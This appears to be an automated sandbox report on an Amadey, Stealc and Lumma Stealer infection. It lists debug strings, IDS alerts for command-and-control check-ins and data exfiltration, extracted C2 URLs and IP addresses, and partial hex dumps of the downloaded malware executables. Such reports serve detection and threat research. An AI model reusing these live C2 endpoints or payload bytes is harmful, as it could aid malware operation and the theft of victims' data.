Source:	Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E0F07h	7_2_061E0EA8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E169Fh	7_2_061E1618
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E169Fh	7_2_061E160A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E0F07h	7_2_061E0E98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E7A3Dh	7_2_061E7698
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E7A3Dh	7_2_061E7689
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E7A3Dh	7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 4x nop then jmp 061E0F07h	7_2_061E11DB

Source: firefox.exe

Memory has grown: Private usage: 1MB later: 222MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49780 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49798 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49816 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49818 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49839 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49919 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49836 -> 104.21.16.9:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: https://atten-supporse.biz:443/api
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: unknown

Network traffic detected: DNS query count 31

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:09 GMTContent-Type: application/octet-streamContent-Length: 1473536Last-Modified: Sat, 30 Nov 2024 02:41:31 GMTConnection: keep-aliveETag: "674a7b5b-167c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 eb 15 00 00 20 00 00 00 ec 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fe 8a 00 00 00 20 16 00 00 8c 00 00 00 ee 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 16 00 00 02 00 00 00 7a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 16 00 00 00 00 00 48 00 00 00 02 00 05 00 64 93 14 00 00 78 01 00 03 00 00 00 01 00 00 06 7c a8 00 00 e6 ea 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 73 04 00 00 06 25 6f 02 00 00 06 6f 03 00 00 06 2a b6 02 73 1a 00 00 0a 7d 01 00 00 04 02 7b 01 00 00 04 1b 6f 1b 00 00 0a 02 7b 01 00 00 04 28 08 00 00 06 28 1c 00 00 0a 6f 1d 00 00 0a 2a 1e 02 28 28 00 00 0a 2a 2e 73 06 00 00 06 80 02 00 00 04 2a 1e 02 28 29 00 00 0a 2a 46 03 6f 2a 00 00 0a 72 15 00 00 70 6f 2b 00 00 0a 2a ba 7e 04 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 06 00 00 02 28 23 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 80 04 00 00 04 7e 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 80 05 00 00 04 2a 6a 28 0b 00 00 06 72 e9 00 00 70 7e 05 00 00 04 6f 35 00 00 0a 74 02 00 00 1b 2a 22 02 03 7d 27 00 00 04 2a 5e 02 0e 04 1f 18 62 03 1f 10 62 60 04 1e 62 60 05 60 7d 27 00 00 04 2a 72 02 20 00 00 00 ff 6e 03 1f 10 62 6a 60 04 1e 62 6a 60 05 6a 60 6d 7d 27 00 00 04 2a 66 03 02 28 18 00 00 06 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28 17 00 00 06 03 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:17 GMTContent-Type: application/octet-streamContent-Length: 1864192Last-Modified: Sat, 30 Nov 2024 03:04:48 GMTConnection: keep-aliveETag: "674a80d0-1c7200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6f 64 75 79 62 67 00 e0 19 00 00 d0 2f 00 00 dc 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 61 71 76 7a 76 63 69 00 10 00 00 00 b0 49 00 00 06 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:26 GMTContent-Type: application/octet-streamContent-Length: 1840128Last-Modified: Sat, 30 Nov 2024 03:04:55 GMTConnection: keep-aliveETag: "674a80d7-1c1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e8 97 48 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 a0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 6a 00 00 04 00 00 83 e5 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 71 77 6e 6b 75 61 79 00 80 1a 00 00 10 50 00 00 74 1a 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 72 73 63 6d 6b 70 00 10 00 00 00 90 6a 00 00 06 00 00 00 ec 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 6a 00 00 22 00 00 00 f2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:34 GMTContent-Type: application/octet-streamContent-Length: 922112Last-Modified: Sat, 30 Nov 2024 03:03:02 GMTConnection: keep-aliveETag: "674a8066-e1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e 80 4a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 62 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 75 5f 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 18 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 a6 00 00 00 40 0d 00 00 a8 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:42 GMTContent-Type: application/octet-streamContent-Length: 2765824Last-Modified: Sat, 30 Nov 2024 03:03:28 GMTConnection: keep-aliveETag: "674a8080-2a3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2a 00 00 04 00 00 b9 3a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6d 66 7a 76 68 62 00 e0 29 00 00 a0 00 00 00 d2 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 74 67 67 72 6c 70 7a 00 20 00 00 00 80 